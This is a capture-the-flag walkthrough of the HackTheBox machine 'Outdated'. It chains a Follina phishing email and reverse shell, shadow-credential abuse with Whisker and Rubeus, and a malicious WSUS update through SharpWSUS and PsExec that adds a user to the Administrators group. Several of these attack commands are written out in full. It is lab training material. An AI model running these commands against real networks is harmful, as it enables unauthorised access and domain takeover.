Outdated — HackTheBox

Outdated is a medium rated windows machine from HackTheBox. It involves enumerating SMB shares and exploiting CVE-2022–30190 (MSDT Follina) to get foothold as btables user. Then, exploiting shadow credentials to pivot to sflowers user. And finally abusing the WSUS by pushing malicious update to escalate privileges and get admin.

NMAP

PORT      STATE    SERVICE       VERSION
25/tcp    open     smtp          hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open     domain        Simple DNS Plus
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-12-10T20:30:11+00:00; +8h00m00s from scanner time.
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-10T20:30:11+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp filtered unknown
49670/tcp filtered unknown
49672/tcp filtered unknown
49884/tcp filtered unknown
49920/tcp filtered unknown
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-12-10T20:29:33
|_  start_date: N/A

PORT 139/445 (SMB)

Checking for null authentication, we can list shares.

One of them named Shares is accessible and contains a PDF file. Download the file.

The PDF lists some recent CVEs and says that these are not patched yet. So, we can try to exploit one of these.

CVE-2022–30190 (Follina)

CVE-2022–30190 is Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability also popularly known as Follina. It works by sending a malicious Microsoft Word document to victim which downloads the staged payload and executes it.

I’m gonna use following POC demonstrated by John Hammond.

GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

The poc downloads netcat binary from remote github repo. But this machine doesn’t have internet connection so it will not work.

We change the URL to our own machine and host the binary.

Next, we run the poc script which creates a malicious document and hosts it on port 80 and listens for reverse shell on port 443.

Then, we host the netcat binary on port 8080 as specified in the script.

Lastly, we send the email with URL link in the message which hosts the malicious document to the email address that we found in the PDF file.

sendEmail -t itsupport@outdated.htb -f plugin@kali.local -u "Congrats" -m "http://<kali ip>" -s <target>

After sending email, we can see that netcat was downloaded.

And we successfully get shell as btables user.

Shell as sflowers User

Looking at the ipconfig, this is not the ip address that we send email on. This is a container.

Since it is a part of domain, we transfer the Sharphound for domain enumeration.

And run it for all collection methods.

Then we can transfer the output zip file to our machine using netcat.

Upload the zip file in Bloodhound. Search for btables user and mark it as owned.

Next, running Shortest Path from Owned Principles query, it shows that btables user has AddKeyCredsLink access on sflowers user.

Shadow Credentials

Looking in the info section, we can find more details about it.

Following guide shows the steps to abuse this privilege.

Shadow Credentials

Following the above guide, we download and transfer the Whisker and Rubeus binaries to target box. Then, execute the whisker using following command.

.\Whisker.exe add /target:sflowers

The output of Whisker is a Rubeus command. On executing the Rubeus command, we get the NT hash of sflowers user.

As seen in the bloodhoud result, sflowers is member of Remote management user, so with evil-winrm we get shell on box as sflowers user by passing the hash.

Privilege Escalation

Next, in the bloodhound we can see that sflowers user is member of WSUS (Windows Server Update Services) Administrators group.

We can also see this running net user command.

WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.

The following article shows the steps to abuse this privileges.

Introducing SharpWSUS

Querying the following registry we can see the WSUS server in use.

WSUS Exploit

Now to abuse this, we download the following binary.

GitHub - nettitude/SharpWSUS

As explained in the above mentioned article, the payload must be a Microsoft signed binary. So, we can use PSExec from sysinternals suite to execute commands.

Transfer both SharpWSUS and PSExec to the target machine.

Then, using WSUS we create a malicious update with payload to add sflowers user to Administrators group.

cmd /c '.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators sflowers /add\"" /title:"UpdateMe"'

Next, we approve the update using SharpWSUS by providing update id from above command results.

cmd /c '.\SharpWSUS.exe approve /updateid:f15cd7ee-dbf1-4b61-bc7f-1a4e7fccb473 /computername:dc.outdated.htb /groupname:"UPDATER"'

Lastly, we wait for the update to be installed. We can check the update status using the following commands.

cmd /c '.\SharpWSUS.exe check /updateid:f15cd7ee-dbf1-4b61-bc7f-1a4e7fccb473 /computername:dc.outdated.htb'

Once, the update is installed, we can see that sflowers user is added to Administrators group.

Now, we can access the Administrators directory and get the root flag.

Thanks for reading.

References

• CVE-2022–30190 (Follina): https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
• Shadow Credentials: https://pentestlab.blog/2022/02/07/shadow-credentials/
• Shadow Creds: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
• https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/mastaer/PowerSharpBinaries/Invoke-Whisker.ps1
• https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
• https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
• WSUS Exploit: https://labs.nettitude.com/blog/introducing-sharpwsus/
• https://github.com/nettitude/SharpWSUS